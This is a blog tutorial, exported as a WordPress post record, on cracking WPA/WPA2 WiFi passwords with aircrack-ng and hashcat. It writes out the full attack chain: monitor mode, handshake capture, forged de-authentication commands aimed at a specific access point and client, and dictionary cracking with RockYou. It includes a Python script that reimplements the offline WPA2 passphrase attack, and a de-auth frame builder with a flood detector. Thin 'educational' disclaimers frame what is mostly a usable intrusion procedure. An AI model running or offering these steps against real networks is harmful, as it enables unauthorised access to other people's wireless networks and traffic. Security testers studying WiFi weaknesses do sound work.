{"id":5961,"date":"2022-01-02T22:31:46","date_gmt":"2022-01-02T22:31:46","guid":{"rendered":"https:\/\/www.securedyou.com\/?p=5961"},"modified":"2022-01-03T23:43:08","modified_gmt":"2022-01-03T23:43:08","slug":"how-to-hack-wpa-wpa2-wifi-passwords-hashcat-aircrack-ng","status":"publish","type":"post","link":"https:\/\/www.securedyou.com\/how-to-hack-wpa-wpa2-wifi-passwords-hashcat-aircrack-ng\/","title":{"rendered":"How to Crack WPA\/WPA2 WiFi Password with Hashcat\/Aircrack-ng"},"content":{"rendered":"
<\/p>\n
In this guide we show how to crack the password of a WPA or WPA2 WiFi network that is protected by a weak password, using two of the best-known wireless hacking tools<\/a>, aircrack-ng and hashcat (see also our broader overview of how to crack WiFi networks<\/a>). The walkthrough is step by step but not exhaustive; it is enough to let you test the security of your own network, or of one you have permission to test.<\/p>\n The capture part of the attack outlined below is entirely passive (your card only listens and transmits nothing), so it is impossible to detect, provided you never actually use the password you crack. The optional de-authentication attack described at the end of the guide speeds up the capture, but it is active: it transmits forged frames, a wireless IDS can flag it, and clients that use 802.11w protected management frames (mandatory in WPA3) simply ignore it.<\/p>\n If you are already familiar with this process, you can skip the descriptions and go straight to the commands.<\/p>\n Note: <\/strong>This tutorial is for educational purposes only. Do not use it against a network you do not own or have written permission to test; the author is not responsible for any misuse.<\/p>\n The tools needed<\/strong><\/h2>\n Everything below uses the aircrack-ng suite (airmon-ng, airodump-ng, aireplay-ng and aircrack-ng), hashcat (optionally through the naive-hashcat wrapper), a wordlist, and a wireless adapter whose driver supports monitor mode.<\/p>\n How to Crack WPA2 Passwords with Aircrack-ng and Hashcat (Tutorial)<\/strong><\/h2>\n Enable Monitor Mode in your WiFi Adapter<\/strong><\/h2>\n Begin by listing the wireless interfaces that support monitor mode. The commands are case sensitive (airmon-ng, not Airmon-ng) and need root, so run them with sudo:<\/p>\n airmon-ng<\/em><\/strong><\/p>\n If no interface is listed, your wireless card or its driver does not support monitor mode. The examples assume the interface is called wlan0; substitute the name shown on your system if it differs. Put the interface into monitor mode with:<\/p>\n airmon-ng start wlan0<\/em><\/strong><\/p>\n Then run iwconfig. 
You should now see a monitor-mode interface listed, named mon0<\/strong> by older versions of airmon-ng and wlan0mon<\/strong> by current ones; the commands below use mon0, so substitute whatever name iwconfig shows you.<\/p>\n Find your target<\/strong><\/p>\n Start listening to the 802.11 beacon frames that nearby access points broadcast, using your monitor interface:<\/p>\n airodump-ng mon0<\/em><\/strong><\/p>\n You will see output like this:<\/p>\n CH 13 ][ Elapsed: 52 s ][ 2022-01-02 17:00<\/em><\/strong><\/p>\n BSSID PWR Beacons #Data, #\/s CH MB ENC CIPHER AUTH ESSID<\/em><\/strong><\/p>\n 14:91:82:F7:52:EB -66 205 26 0 1 54e OPN belkin.2e8.guests<\/em><\/p>\n 14:91:82:F7:52:E8 -64 212 56 0 1 54e WPA2 CCMP PSK belkin.2e8<\/em><\/p>\n 14:22:DB:1A:DB:64 -81 44 7 0 1 54 WPA2 CCMP <length: 0><\/em><\/p>\n 14:22:DB:1A:DB:66 -83 48 0 0 1 54e. WPA2 CCMP PSK securedyou<\/em><\/p>\n 9C:5C:8E:C9:AB:C0 -81 19 0 0 3 54e WPA2 CCMP PSK securedyou<\/em><\/p>\n 00:23:69:AD:AF:94 -82 350 4 0 1 54e WPA2 CCMP PSK SecuredYou is the best<\/em><\/p>\n 06:26:BB:75:ED:69 -84 232 0 0 1 54e. WPA2 CCMP PSK HH2<\/em><\/p>\n 78:71:9C:99:67:D0 -82 339 0 0 1 54e. WPA2 CCMP PSK ARRIS-67D2<\/em><\/p>\n 9C:34:26:9F:2E:E8 -85 40 0 0 1 54e. WPA2 CCMP PSK Comcast_2EEA-EXT<\/em><\/p>\n BC:EE:7B:8F:48:28 -85 119 10 0 1 54e WPA2 CCMP PSK root<\/em><\/p>\n EC:1A:59:36:AD:CA -86 210 28 0 1 54e WPA2 CCMP PSK belkin.dca<\/em><\/p>\n Two access points advertise the ESSID securedyou; we target the one on channel 3 with BSSID 9C:5C:8E:C9:AB:C0. Note both the BSSID (the access point's MAC address) and the channel (CH) shown by airodump-ng, because the next step needs them.<\/p>\n SEE ALSO:<\/strong> How to Hack WPA3 WiFi Network Passwords in 2022 (Tutorial)<\/a>.<\/p>\n How to Capture a 4-way Handshake in WiFi Networks<\/strong><\/h2>\n WPA and WPA2-Personal authenticate a client with a 4-way handshake. You do not need to understand it in detail, but it helps to know why capturing one is enough: the passphrase and the network name are stretched with PBKDF2-HMAC-SHA1 (4096 rounds) into the pairwise master key, and the handshake carries the two nonces and MAC addresses from which the session key is derived, together with a MIC computed with that key. Anyone holding the handshake can therefore test passphrase guesses offline, one PBKDF2 computation per guess, without ever talking to the access point again; that is exactly what aircrack-ng and hashcat do. So you need to capture one of these handshakes to crack the network password. 
A handshake occurs whenever a device joins the network, for example when your neighbours come home. To capture one, run airodump-ng again restricted to the target, using the channel and BSSID values from the previous command (the -c and --bssid options shown in the de-authentication section below) and with an output file prefix so that the capture is written to disk.<\/p>\n Once a handshake has been captured you will see something like [ WPA handshake: bc:d3:c9:ef:d2:67 in the top right of the screen, just right of the elapsed time.<\/p>\n If you are impatient and comfortable with an active attack, you can force devices already connected to the target network to reconnect by sending them forged de-authentication frames; the reconnection produces a fresh 4-way handshake. This is covered in the de-authentication section below.<\/p>\n Once the handshake has been captured, press Ctrl-C to quit airodump-ng. In the directory where you told airodump-ng to save the capture you will find a .cap file named after the prefix you gave, with -01.cap appended (in this example the file is .\/-01.cap). This is the file we crack. Rename it after the network we are attacking:<\/p>\n mv .\/-01.cap securedyou.cap<\/em><\/strong><\/p>\n SEE ALSO:<\/strong> How to Secure your WiFi Routers from being hacked<\/a>.<\/p>\n The Real Fun: Cracking the WPA2 Password<\/strong><\/h2>\n The last step is to crack the password using the captured handshake. If you have a GPU, use hashcat; it is far faster than CPU cracking. We use naive-hashcat, a wrapper script that makes hashcat easy to run.<\/p>\n If you have no GPU, you can use a GPU cracking service such as GPUHASH.me or OnlineHashCrack, bearing in mind that uploading the handshake hands the service the network name and, if it succeeds, the password; or you can crack on your CPU with aircrack-ng. Overclocking your GPU speeds up brute-forcing<\/a> somewhat, but the quality of the wordlist matters far more.<\/p>\n Keep in mind that both methods below assume a weak, human-chosen password. 
Many WPA/WPA2 routers ship with a random 12-character password that most users never change, and those will not be in RockYou. For such targets use the WPA-length files from the probable-wordlists project, which contain only candidates of valid WPA passphrase length (8 to 63 characters); anything shorter can never be the key, so a wordlist full of short entries just wastes time.<\/p>\n <\/p>\n Using Naive-Hashcat to do the Magic<\/strong><\/h2>\n Before cracking with naive-hashcat, convert the .cap file to hashcat's .hccapx format, either by uploading it to https:\/\/hashcat.net\/cap2hccapx<\/a> (the same caveat about uploading a handshake applies) or by running the cap2hccapx tool from hashcat-utils locally.<\/p>\n Then download naive-hashcat and run it:<\/p>\n git clone https:\/\/github.com\/brannondorsey\/naive-hashcat<\/em><\/strong><\/p>\n cd naive-hashcat<\/em><\/strong><\/p>\n Download a wordlist or large dictionary file:<\/p>\n Passwords Wordlist for Cracking WPA2 WiFi Passwords<\/span><\/a><\/p>\n Set the hashcat hash mode for WPA\/WPA2:<\/p>\n 2500 is the hashcat hash mode for WPA\/WPA2<\/em><\/strong><\/p>\n HASH_FILE=securedyou.hccapx POT_FILE=securedyou.pot HASH_TYPE=2500 .\/naive-hashcat.sh<\/em><\/strong><\/p>\n Note that hashcat 6.0 and later mark mode 2500 and the .hccapx format as deprecated in favour of mode 22000, which reads a .hc22000 file produced by hcxpcapngtool and handles both EAPOL handshakes and PMKIDs; the underlying PBKDF2 work, and therefore the cracking speed, is the same.<\/p>\n SEE ALSO:<\/strong> 10 Best WiFi Hacking Tools for Kali Linux 2022 (Free Download)<\/a>.<\/p>\n Naive-hashcat runs a sequence of dictionary, rule, combination and mask attacks and can take ten days or more against a medium-strength password. Cracked passwords are written to the file named in POT_FILE (securedyou.pot here), so check it periodically. Once the password has been cracked, the pot file contains a line like this:<\/p>\n e30a5a57fc00211fc9f57a4491508cc3:9c5c8ec9abc0:acd1b8dfd971:ASUS:securedyouhacking<\/em><\/strong><\/p>\n The colon-separated fields are the hash, the access point MAC, the client MAC, the network name (ESSID) and, last, the password.<\/p>\n Using Aircrack-ng to perform Dictionary Attack<\/strong><\/h2>\n Aircrack-ng can also run a basic dictionary attack on your CPU. Before running the attack you need a wordlist. 
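<\/p>\n Whichever wordlist you use, aircrack-ng and hashcat perform exactly the same computation for every candidate, and it is worth seeing it spelled out. The Python script below is an added example, not code from this tutorial or from the aircrack-ng or hashcat projects: it reimplements the WPA2-PSK derivation (PBKDF2-HMAC-SHA1 from passphrase and SSID to the PMK, the 802.11i PRF to the key confirmation key, and the HMAC-SHA1 MIC over EAPOL message 2) and runs a dictionary attack against a handshake. Because it has to run offline it constructs its own handshake from a chosen passphrase, made-up nonces, the BSSID 9C:5C:8E:C9:AB:C0 and client 64:BC:0C:48:97:F7 used in this tutorial, and a six-word stand-in for rockyou.txt; with a real capture you would read the SSID, MAC addresses, nonces, EAPOL frame and MIC out of the .cap file instead, which is what cap2hccapx and hcxpcapngtool do. For reference, the aircrack-ng invocation that produces the KEY FOUND! message for the capture above is aircrack-ng -a2 -b 9C:5C:8E:C9:AB:C0 -w rockyou.txt securedyou.cap (-a2 selects WPA-PSK, -b the target BSSID, -w the wordlist).<\/p>\n

```python
"""Offline WPA2-PSK dictionary attack against a captured 4-way handshake.

Added example, not code from this tutorial or from the aircrack-ng / hashcat
projects. It reimplements, with only the standard library, the computation
those tools perform for every candidate passphrase. The handshake is
constructed here from a known passphrase so the script runs offline; with a
real capture the same fields come out of the .cap file.
"""
import hashlib
import hmac
from typing import Optional

# Constructed sample capture. In a real attack these come from the .cap file.
SSID = "securedyou"                                      # ESSID from airodump-ng
AP_MAC = bytes.fromhex("9c5c8ec9abc0")                   # BSSID of the target (channel 3)
CLIENT_MAC = bytes.fromhex("64bc0c4897f7")               # STATION that performed the handshake
ANONCE = hashlib.sha256(b"constructed anonce").digest()  # 32-byte nonce from message 1
SNONCE = hashlib.sha256(b"constructed snonce").digest()  # 32-byte nonce from message 2

# Known-answer vector from the IEEE 802.11 standard (passphrase "password", SSID "IEEE").
IEEE_PMK = bytes.fromhex("f42c6fc52df0ebef9ebb4b90b38a5f902e83fe1b135a70e23aed762e9710a12e")


def pmk_from_passphrase(passphrase: str, ssid: str) -> bytes:
    """Pairwise Master Key = PBKDF2-HMAC-SHA1(passphrase, ssid, 4096 rounds, 32 bytes).
    This step dominates the cost of every guess."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def kck_from_pmk(pmk: bytes, ap: bytes, client: bytes, anonce: bytes, snonce: bytes) -> bytes:
    """802.11i PRF-384 over the PMK, both MACs and both nonces yields the PTK
    (KCK || KEK || TK). Only the first 16 bytes, the key confirmation key used
    for the MIC, are needed to test a guess."""
    label = b"Pairwise key expansion"
    data = min(ap, client) + max(ap, client) + min(anonce, snonce) + max(anonce, snonce)
    ptk = b"".join(hmac.new(pmk, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest()
                   for i in range(3))              # 3 x 20 bytes >= 48
    return ptk[:16]


def eapol_mic(kck: bytes, eapol_frame: bytes) -> bytes:
    """MIC over the whole EAPOL-Key frame with its MIC field zeroed. Key descriptor
    version 2 (WPA2 / CCMP): HMAC-SHA1 truncated to 16 bytes. WPA / TKIP
    (version 1) uses HMAC-MD5 instead."""
    return hmac.new(kck, eapol_frame, hashlib.sha1).digest()[:16]


def build_message2(snonce: bytes) -> bytes:
    """EAPOL-Key message 2 (client -> AP) with the MIC field zeroed, laid out as
    the tools hash it: EAPOL header, then the 802.11 key descriptor."""
    rsn_ie = bytes.fromhex("30140100000fac040100000fac040100000fac020000")  # CCMP / PSK
    body = (b"\x02"                      # descriptor type: RSN
            + b"\x01\x0a"                # key info: version 2, pairwise, MIC bit set
            + b"\x00\x10"                # key length: 16 (CCMP)
            + (1).to_bytes(8, "big")     # replay counter
            + snonce                     # key nonce
            + bytes(16)                  # key IV
            + bytes(8)                   # key RSC
            + bytes(8)                   # key ID
            + bytes(16)                  # MIC, zeroed before hashing
            + len(rsn_ie).to_bytes(2, "big")
            + rsn_ie)                    # key data
    return b"\x02\x03" + len(body).to_bytes(2, "big") + body   # EAPOL v2, type 3 = Key


def make_handshake(passphrase: str) -> dict:
    """Stand-in for the capture: compute the MIC the real client would have sent."""
    kck = kck_from_pmk(pmk_from_passphrase(passphrase, SSID), AP_MAC, CLIENT_MAC, ANONCE, SNONCE)
    frame = build_message2(SNONCE)
    return {"ssid": SSID, "ap": AP_MAC, "client": CLIENT_MAC, "anonce": ANONCE,
            "snonce": SNONCE, "eapol": frame, "mic": eapol_mic(kck, frame)}


def check_passphrase(hs: dict, candidate: str) -> bool:
    """One dictionary-attack step: PBKDF2, PRF, HMAC, constant-time compare."""
    if not 8 <= len(candidate) <= 63:               # outside the valid WPA range: skip
        return False
    kck = kck_from_pmk(pmk_from_passphrase(candidate, hs["ssid"]),
                       hs["ap"], hs["client"], hs["anonce"], hs["snonce"])
    return hmac.compare_digest(eapol_mic(kck, hs["eapol"]), hs["mic"])


def crack(hs: dict, wordlist) -> Optional[str]:
    """Return the first candidate whose MIC matches, or None if the wordlist misses."""
    return next((word for word in wordlist if check_passphrase(hs, word)), None)


def self_check() -> bool:
    """PBKDF2 step against the published IEEE test vector."""
    return pmk_from_passphrase("password", "IEEE") == IEEE_PMK


# Constructed six-entry stand-in for rockyou.txt and a handshake for a weak passphrase.
WORDLIST = ["password", "123456", "letmein!", "securedyou2022", "securedyouhacking", "Tr0ub4dor&3"]
HANDSHAKE = make_handshake("securedyouhacking")

if __name__ == "__main__":
    assert self_check()
    print("KEY FOUND! [", crack(HANDSHAKE, WORDLIST), "]")
```

Each candidate costs two PBKDF2 blocks of 4096 rounds, roughly 8192 HMAC-SHA1 evaluations, before the cheap PRF and MIC check. That fixed cost is why a GPU rather than a cleverer algorithm is the lever, why the passphrase is the only thing the defender controls, and why a random 12-character key never turns up in any wordlist. The self-check against the IEEE test vector confirms the PBKDF2 step is implemented correctly before any time is spent on a real capture.<\/p>\n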
We recommend the well-known RockYou dictionary file.<\/p>\n Download RockYou Dictionary Wordlist File<\/span><\/a><\/p>\n Keep in mind that this is a dictionary attack: if the network password is not in the wordlist, it will not be cracked. Aircrack-ng takes the capture file, the BSSID of the target access point and the wordlist, and tests every candidate against the MIC in the captured handshake.<\/p>\n If the password is found you will see a KEY FOUND! message in the terminal, followed by the plain-text network password.<\/p>\n SEE ALSO:<\/strong> 11 Best Live CD Security Linux Distros for Ethical Hacking and Penetration Testing<\/a>.<\/p>\n Performing the De-authentication Attack<\/strong><\/h2>\n The de-authentication attack sends forged 802.11 de-authentication frames from your machine to a client of the network you are attacking. The frames carry a spoofed source address, so to the client they appear to come from the access point itself. On receiving them most clients disconnect and immediately reconnect, performing a fresh 4-way handshake that you capture if airodump-ng is still listening. Because the frames are transmitted from your card this step is not passive: a wireless IDS can flag the burst, and clients that negotiate 802.11w protected management frames (mandatory in WPA3, optional in WPA2) discard unprotected de-authentication frames, so the attack does nothing against them.<\/p>\n Use airodump-ng to monitor the target access point (with -c channel --bssid MAC) until a client shows up in the STATION column. In this example the client MAC is 64:BC:0C:48:97:F7.<\/p>\n Leave airodump-ng running and open a new terminal. There we use aireplay-ng (note the spelling: aireplay, not airplay) to send forged de-authentication frames to the victim client, which forces it to reconnect and, with luck, hands us the handshake.<\/p>\n You can also broadcast de-authentication frames to all clients of the access point by omitting the client address; this is noisier but also reaches clients you have not seen yet.<\/p>\n SEE ALSO:<\/strong> Ethical Hacking Cheat Sheet for Professional Hackers<\/a>.<\/p>\n As soon as the frames have been sent, switch back to the airodump-ng window; with luck you will see [ WPA handshake: 9C:5C:8E:C9:AB:C0 in the top right. 
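<\/p>\n The frames this attack relies on are simple, and that simplicity is also what makes the attack easy to spot. The Python script below is an added example, not code from this tutorial or from aircrack-ng: it builds 802.11 de-authentication frames in the spoofed form aireplay-ng sends (receiver = the client or the broadcast address, transmitter and BSSID = the access point, reason code 7) and then runs a small flood detector of the kind a monitor-mode sensor would use over a constructed list of timestamped frames. Nothing is transmitted. The aireplay-ng commands the text refers to are, with the addresses from this tutorial and mon0 as the monitor interface, aireplay-ng -0 2 -a 9C:5C:8E:C9:AB:C0 -c 64:BC:0C:48:97:F7 mon0 for a directed attack and aireplay-ng -0 2 -a 9C:5C:8E:C9:AB:C0 mon0 for a broadcast one (-0 is the de-authentication mode followed by the number of bursts, -a the access point, -c the client).<\/p>\n

```python
"""802.11 de-authentication frames: what aireplay-ng -0 puts on the air and how
a monitor-mode sensor spots it.

Added example, not code from the tutorial or from aircrack-ng. It only builds
and parses frames in memory; nothing is transmitted.
"""
from collections import defaultdict, deque

AP_MAC = bytes.fromhex("9c5c8ec9abc0")      # target BSSID from the airodump-ng table
CLIENT_MAC = bytes.fromhex("64bc0c4897f7")  # STATION MAC from the text
BROADCAST = b"\xff" * 6
REASON_CLASS3 = 7            # reason code aireplay-ng uses ("class 3 frame from nonassociated STA")

SUBTYPE_DEAUTH = 0xC
SUBTYPE_DISASSOC = 0xA
SUBTYPE_BEACON = 0x8


def mgmt_header(subtype: int, addr1: bytes, addr2: bytes, addr3: bytes, seq: int) -> bytes:
    """24-byte 802.11 management header: frame control (version 0, type 0, given
    subtype), duration, addr1 (receiver), addr2 (transmitter), addr3 (BSSID),
    sequence control."""
    frame_control = bytes([(subtype << 4) | 0x00, 0x00])
    duration = b"\x00\x00"
    seq_ctrl = (seq << 4).to_bytes(2, "little")          # fragment 0, sequence number
    return frame_control + duration + addr1 + addr2 + addr3 + seq_ctrl


def build_deauth(dst: bytes, bssid: bytes, seq: int = 0, reason: int = REASON_CLASS3) -> bytes:
    """Forged de-authentication as aireplay-ng -0 sends it: the client (or
    ff:ff:ff:ff:ff:ff) as receiver and the access point as both transmitter and
    BSSID, so the client believes the AP kicked it. The body is the reason code."""
    return mgmt_header(SUBTYPE_DEAUTH, dst, bssid, bssid, seq) + reason.to_bytes(2, "little")


def build_beacon(bssid: bytes, seq: int) -> bytes:
    """Minimal beacon (body truncated); only the header matters to the detector."""
    return mgmt_header(SUBTYPE_BEACON, BROADCAST, bssid, bssid, seq) + bytes(12)


def parse_header(frame: bytes):
    """Return (type, subtype, addr1, addr2, addr3) of a raw 802.11 frame."""
    fc = frame[0]
    return (fc >> 2) & 0x3, (fc >> 4) & 0xF, frame[4:10], frame[10:16], frame[16:22]


def is_deauth_or_disassoc(frame: bytes) -> bool:
    ftype, subtype, *_ = parse_header(frame)
    return ftype == 0 and subtype in (SUBTYPE_DEAUTH, SUBTYPE_DISASSOC)


def detect_deauth_flood(frames, threshold: int = 5, window: float = 2.0) -> dict:
    """frames: iterable of (timestamp_seconds, raw_frame) in capture order.
    Returns {claimed_transmitter_mac: first_alert_time} for every transmitter
    address that sent at least `threshold` de-auth/disassoc frames within
    `window` seconds. A real AP de-authenticates a client rarely; aireplay-ng
    sends 64 frames per burst, so even -0 1 stands out."""
    recent = defaultdict(deque)
    flagged = {}
    for ts, frame in frames:
        if not is_deauth_or_disassoc(frame):
            continue
        _, _, _, src, _ = parse_header(frame)
        q = recent[src]
        q.append(ts)
        while q and ts - q[0] > window:      # slide the window forward
            q.popleft()
        if len(q) >= threshold and src not in flagged:
            flagged[src] = ts
    return flagged


def sample_capture() -> list:
    """Constructed capture: normal beacons, one legitimate de-auth, then an
    aireplay-ng style burst of 64 forged frames to the client and to broadcast."""
    frames = [(0.1 * i, build_beacon(AP_MAC, i)) for i in range(3)]
    frames.append((0.3, build_deauth(CLIENT_MAC, AP_MAC, seq=3)))          # one real kick
    for i in range(64):
        dst = CLIENT_MAC if i % 2 == 0 else BROADCAST
        frames.append((10.0 + 0.001 * i, build_deauth(dst, AP_MAC, seq=100 + i)))
    return frames


if __name__ == "__main__":
    for src, ts in detect_deauth_flood(sample_capture()).items():
        print(f"de-auth flood claiming transmitter {src.hex(':')} from t={ts:.3f}s")
```

The detector keys on the claimed transmitter address: a real access point de-authenticates a client rarely, whereas aireplay-ng emits its frames in bursts of 64, so a handful of de-authentication or disassociation frames from one BSSID within two seconds is a reliable signal (Kismet's DEAUTHFLOOD alert is essentially this check). Detection tells you the attack happened; enabling 802.11w on the access point is what stops it.<\/p>\n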
Now that the handshake has been captured, you are ready to crack the network password as described above.<\/p>\n Video Version of the tutorial<\/strong><\/h2>\n If you learn better by watching someone do it, here is a video version.<\/p>\n Hacking WPA2 Wireless Passwords using Aircrack-ng\/Hashcat<\/span><\/a><\/p>\n Alternative wireless hacking tools you could use:<\/strong><\/p>\n Last Words<\/strong><\/h2>\n Disclaimer:<\/strong> This is a demonstration of how WPA2 passwords can be cracked with tools such as hashcat and aircrack-ng. Only do this in a controlled environment where you have permission. I hope you enjoyed this tutorial and got the most out of it.<\/p>\n","protected":false},"excerpt":{"rendered":" In this guide, we are going to help you out how you can crack WiFi networks using two of the best wireless hacking tools that are secured by using a weak password. We will be detailing step-by-step on how you can hack WPA2 using aircrack-ng and hashcat, though it is not exhaustive. This is going […]<\/p>\n","protected":false},"author":1,"featured_media":5969,"comment_status":"open","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":[],"categories":[42,79],"tags":[1842,1843,1845,1844],"yoast_head":"\n